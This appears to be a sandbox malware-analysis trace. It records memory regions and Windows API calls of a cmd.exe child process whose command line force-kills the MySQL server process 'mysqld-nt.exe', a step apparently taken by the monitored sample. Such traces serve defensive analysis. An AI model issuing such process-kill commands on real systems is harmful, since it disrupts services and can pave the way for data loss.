Region: id = 3615 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 3616 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 3617 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3618 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3619 start_va = 0x4430000 end_va = 0x4435fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004430000" filename = "" Thread: id = 258 os_tid = 0x1294 Thread: id = 259 os_tid = 0x127c Thread: id = 260 os_tid = 0xc74 Thread: id = 261 os_tid = 0xc28 Thread: id = 262 os_tid = 0x7a4 Process: id = "48" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2fbe7000" os_pid = "0xc7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mysqld-nt.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3622 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3623 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3624 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3625 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3626 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3627 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3628 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3629 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3630 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3631 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3632 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3633 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3634 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3635 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3636 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3637 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3638 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3639 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3640 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3641 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3642 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3643 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3644 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3645 start_va = 0x400000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3646 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3647 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3648 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3649 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3650 start_va = 0x550000 end_va = 0x60dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3651 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3652 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3653 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3654 start_va = 0x750000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 3655 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3656 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3657 start_va = 0x830000 end_va = 0xb66fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 263 os_tid = 0x6c4 [0190.956] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0190.956] __set_app_type (_Type=0x1) [0190.956] __p__fmode () returned 0x74974d6c [0190.956] __p__commode () returned 0x74975b1c [0190.956] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0190.956] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0190.956] GetCurrentThreadId () returned 0x6c4 [0190.956] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6c4) returned 0x78 [0190.957] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0190.957] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0190.957] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.962] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.963] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0190.964] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.964] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.964] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.965] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.965] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.965] GetConsoleOutputCP () returned 0x1b5 [0190.966] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0190.966] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0190.966] _get_osfhandle (_FileHandle=1) returned 0x144 [0190.966] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0190.967] _get_osfhandle (_FileHandle=1) returned 0x144 [0190.967] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0190.967] _get_osfhandle (_FileHandle=0) returned 0x140 [0190.967] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0190.967] GetEnvironmentStringsW () returned 0x437cc0* [0190.967] GetProcessHeap () returned 0x430000 [0190.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa1a) returned 0x4386e8 [0190.967] FreeEnvironmentStringsA (penv="A") returned 1 [0190.967] GetProcessHeap () returned 0x430000 [0190.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4) returned 0x430550 [0190.967] GetEnvironmentStringsW () returned 0x437cc0* [0190.967] GetProcessHeap () returned 0x430000 [0190.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa1a) returned 0x439110 [0190.967] FreeEnvironmentStringsA (penv="A") returned 1 [0190.967] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.968] RegCloseKey (hKey=0x88) returned 0x0 [0190.968] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0190.968] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0190.969] RegCloseKey (hKey=0x88) returned 0x0 [0190.969] time (in: timer=0x0 | out: timer=0x0) returned 0x6234422d [0190.969] srand (_Seed=0x6234422d) [0190.969] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld-nt.exe \"" [0190.969] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld-nt.exe \"" [0190.969] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0190.969] GetProcessHeap () returned 0x430000 [0190.969] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x439b38 [0190.969] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x439b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0190.969] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0190.969] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0190.969] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.969] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0190.969] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0190.969] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0190.969] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0190.969] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0190.969] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0190.969] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0190.970] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0190.970] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0190.970] GetProcessHeap () returned 0x430000 [0190.970] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4386e8) returned 1 [0190.971] GetEnvironmentStringsW () returned 0x437cc0* [0190.971] GetProcessHeap () returned 0x430000 [0190.971] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa32) returned 0x43a790 [0190.971] FreeEnvironmentStringsA (penv="A") returned 1 [0190.971] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0190.972] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.972] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.972] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.972] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.972] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.972] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.972] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.972] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.972] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.972] GetProcessHeap () returned 0x430000 [0190.972] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x4305c8 [0190.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0190.973] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0190.973] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0190.973] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x430618 [0190.974] FindClose (in: hFindFile=0x430618 | out: hFindFile=0x430618) returned 1 [0190.974] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x430618 [0190.975] FindClose (in: hFindFile=0x430618 | out: hFindFile=0x430618) returned 1 [0190.975] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0190.975] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x430618 [0190.975] FindClose (in: hFindFile=0x430618 | out: hFindFile=0x430618) returned 1 [0190.975] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0190.975] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0190.975] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0190.975] GetProcessHeap () returned 0x430000 [0190.976] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43a790) returned 1 [0190.976] GetEnvironmentStringsW () returned 0x437cc0* [0190.976] GetProcessHeap () returned 0x430000 [0190.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa76) returned 0x439d50 [0190.976] FreeEnvironmentStringsA (penv="=") returned 1 [0190.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0190.976] GetProcessHeap () returned 0x430000 [0190.976] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4305c8) returned 1 [0190.977] GetProcessHeap () returned 0x430000 [0190.977] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400e) returned 0x43bc50 [0190.978] GetProcessHeap () returned 0x430000 [0190.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4e) returned 0x43a7d0 [0190.978] GetProcessHeap () returned 0x430000 [0190.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x43fc68 [0190.979] GetProcessHeap () returned 0x430000 [0190.979] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x443c78 [0190.981] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0190.981] GetProcessHeap () returned 0x430000 [0190.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x418) returned 0x43a828 [0190.981] SetErrorMode (uMode=0x0) returned 0x8003 [0190.981] SetErrorMode (uMode=0x1) returned 0x0 [0190.982] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x43a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0190.982] SetErrorMode (uMode=0x8003) returned 0x1 [0190.982] GetProcessHeap () returned 0x430000 [0190.982] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x43a828, Size=0x80) returned 0x43a828 [0190.982] GetProcessHeap () returned 0x430000 [0190.982] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x43a828) returned 0x80 [0190.982] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0190.982] GetProcessHeap () returned 0x430000 [0190.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x43a8b0 [0190.982] GetProcessHeap () returned 0x430000 [0190.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb8) returned 0x43a920 [0190.983] GetProcessHeap () returned 0x430000 [0190.983] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x43a920, Size=0x62) returned 0x43a920 [0190.983] GetProcessHeap () returned 0x430000 [0190.983] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x43a920) returned 0x62 [0190.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0190.983] GetProcessHeap () returned 0x430000 [0190.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe0) returned 0x43a990 [0190.989] GetProcessHeap () returned 0x430000 [0190.989] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x43a990, Size=0x76) returned 0x43a990 [0190.989] GetProcessHeap () returned 0x430000 [0190.989] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x43a990) returned 0x76 [0190.989] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0190.990] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mysqld-nt.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0190.990] GetLastError () returned 0x3 [0190.990] GetProcessHeap () returned 0x430000 [0190.991] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43fc68) returned 1 [0190.991] GetProcessHeap () returned 0x430000 [0190.991] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x443c78) returned 1 [0190.991] GetProcessHeap () returned 0x430000 [0190.992] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43bc50) returned 1 [0190.992] GetConsoleOutputCP () returned 0x1b5 